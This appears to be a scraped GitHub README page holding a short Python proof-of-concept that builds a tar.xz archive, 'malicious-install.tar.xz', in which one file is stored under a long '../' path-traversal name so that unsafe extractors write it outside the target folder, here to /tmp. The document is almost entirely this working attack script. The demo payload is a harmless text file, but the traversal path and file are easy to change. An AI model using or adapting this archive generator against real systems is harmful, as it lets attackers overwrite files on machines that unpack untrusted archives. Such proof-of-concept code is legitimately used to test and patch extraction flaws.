README.md
Rendering markdown...
import os
import tarfile
def create_malicious_tar(folder_path, output_tar, malicious_file, traversal_path):
with tarfile.open(output_tar, "w:xz") as tf:
for root, _, files in os.walk(folder_path):
for file in files:
file_path = os.path.join(root, file)
if file == malicious_file:
arcname = os.path.join(traversal_path, malicious_file)
tf.add(file_path, arcname=arcname)
else:
arcname = os.path.relpath(file_path, folder_path)
tf.add(file_path, arcname=arcname)
print(f"Malicious tar.xz created: {output_tar}")
folder_path = "tarcontent"
output_tar = "malicious-install.tar.xz"
malicious_file = "hello.txt"
traversal_path = "../../../../../../../../../../../tmp/"
create_malicious_tar(folder_path, output_tar, malicious_file, traversal_path)